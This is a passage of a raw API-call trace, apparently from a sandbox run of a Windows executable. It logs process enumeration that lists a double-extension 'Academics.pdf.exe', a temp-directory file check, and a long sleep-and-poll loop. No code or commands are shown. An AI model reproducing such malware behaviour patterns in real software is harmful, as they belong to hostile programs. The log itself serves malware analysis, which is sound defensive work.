th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0313.123] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0313.123] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0313.124] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0313.125] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0313.125] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0313.126] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0313.127] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0313.127] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0313.128] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0313.129] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0313.129] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0313.130] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0313.131] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0313.131] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0313.132] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0313.133] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0313.133] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0313.134] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0313.134] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0313.135] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0313.136] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0313.136] CloseHandle (hObject=0x294) returned 1 [0313.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0313.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0313.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0313.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0313.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0313.137] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0313.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0313.137] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0313.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0313.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0313.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0313.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0313.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0313.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0313.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0313.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0313.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0313.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0313.137] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0313.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0313.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0313.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0313.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0313.137] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0313.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0313.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0313.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0313.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0313.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0313.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0313.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0313.138] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0313.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0313.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0313.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa850 [0313.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0313.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0313.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa610 [0313.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0313.138] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8bf2a0 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0313.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0313.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0313.138] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0313.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0313.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0313.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0313.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0313.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0313.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0313.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0313.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0313.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0313.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0313.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0313.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0313.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0313.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x24207f0 [0313.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0313.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0313.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0313.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0313.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0313.139] GetFileAttributesW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\8x8x8")) returned 0x2020 [0313.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0313.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0313.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0313.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0313.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0313.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0313.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0313.140] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0313.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0313.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0313.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0313.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0313.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0313.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0313.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0313.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0313.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0313.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0313.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0313.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0313.140] timeGetTime () returned 0x4e2af [0313.141] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0313.141] Sleep (dwMilliseconds=0xa) [0313.155] timeGetTime () returned 0x4e2bf [0313.155] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0313.155] Sleep (dwMilliseconds=0xa) [0313.170] timeGetTime () returned 0x4e2ce [0313.170] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0313.170] Sleep (dwMilliseconds=0xa) [0313.188] timeGetTime () returned 0x4e2de [0313.188] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0313.188] Sleep (dwMilliseconds=0xa) [0313.201] timeGetTime () returned 0x4e2ed [0313.202] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0313.202] Sleep (dwMilliseconds=0xa) [0313.217] timeGetTime () returned 0x4e2fd [0313.217] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0313.217] Sleep (dwMilliseconds=0xa) [0313.233] timeGetTime () returned 0x4e30d [0313.233] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0313.233] Sleep (dwMilliseconds=0xa) [0313.248] timeGetTime () returned 0x4e31c [0313.248] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0313.248] Sleep (dwMilliseconds=0xa) [0313.264] timeGetTime () returned 0x4e32c [0313.264] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0313.264] Sleep (dwMilliseconds=0xa) [0313.280] timeGetTime () returned 0x4e33b [0313.280] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0313.280] Sleep (dwMilliseconds=0xa) [0313.295] timeGetTime () returned 0x4e34b [0313.295] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0313.295] Sleep (dwMilliseconds=0xa) [0313.311] timeGetTime () returned 0x4e35b [0313.311] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0313.311] Sleep (dwMilliseconds=0xa) [0313.326] timeGetTime () returned 0x4e36a [0313.326] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0313.326] Sleep (dwMilliseconds=0xa) [0313.342] timeGetTime () returned 0x4e37a [0313.342] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0313.342] Sleep (dwMilliseconds=0xa) [0313.357] timeGetTime () returned 0x4e389 [0313.358] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0313.358] Sleep (dwMilliseconds=0xa) [0313.373] timeGetTime () returned 0x4e399 [0313.373] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0313.373] Sleep (dwMilliseconds=0xa) [0313.389] timeGetTime () returned 0x4e3a9 [0313.389] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0313.389] Sleep (dwMilliseconds=0xa) [0313.404] timeGetTime () returned 0x4e3b8 [0313.404] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0313.404] Sleep (dwMilliseconds=0xa) [0313.420] timeGetTime () returned 0x4e3c8 [0313.420] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0313.420] Sleep (dwMilliseconds=0xa) [0313.436] timeGetTime () returned 0x4e3d7 [0313.436] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0313.436] Sleep (dwMilliseconds=0xa) [0313.452] timeGetTime () returned 0x4e3e7 [0313.452] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0313.452] Sleep (dwMilliseconds=0xa) [0313.467] timeGetTime () returned 0x4e3f7 [0313.467] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0313.467] Sleep (dwMilliseconds=0xa) [0313.482] timeGetTime () returned 0x4e406 [0313.482] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0313.483] Sleep (dwMilliseconds=0xa) [0313.498] timeGetTime () returned 0x4e416 [0313.498] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0313.498] Sleep (dwMilliseconds=0xa) [0313.514] timeGetTime () returned 0x4e425 [0313.514] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0313.514] Sleep (dwMilliseconds=0xa) [0313.529] timeGetTime () returned 0x4e435 [0313.529] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0313.529] Sleep (dwMilliseconds=0xa) [0313.545] timeGetTime () returned 0x4e445 [0313.545] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0313.545] Sleep (dwMilliseconds=0xa) [0313.560] timeGetTime () returned 0x4e454 [0313.560] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0313.560] Sleep (dwMilliseconds=0xa) [0313.576] timeGetTime () returned 0x4e464 [0313.576] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0313.576] Sleep (dwMilliseconds=0xa) [0313.591] timeGetTime () returned 0x4e473 [0313.592] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0313.592] Sleep (dwMilliseconds=0xa) [0313.607] timeGetTime () returned 0x4e483 [0313.607] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0313.607] Sleep (dwMilliseconds=0xa) [0313.623] timeGetTime () returned 0x4e493 [0313.623] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0313.623] Sleep (dwMilliseconds=0xa) [0313.638] timeGetTime () returned 0x4e4a2 [0313.638] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0313.638] Sleep (dwMilliseconds=0xa) [0313.654] timeGetTime () returned 0x4e4b2 [0313.654] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0313.654] Sleep (dwMilliseconds=0xa) [0313.670] timeGetTime () returned 0x4e4c1 [0313.670] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0313.670] Sleep (dwMilliseconds=0xa) [0313.685] timeGetTime () returned 0x4e4d1 [0313.685] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0313.685] Sleep (dwMilliseconds=0xa) [0313.701] timeGetTime () returned 0x4e4e1 [0313.701] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0313.701] Sleep (dwMilliseconds=0xa) [0313.724] timeGetTime () returned 0x4e4f0 [0313.724] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 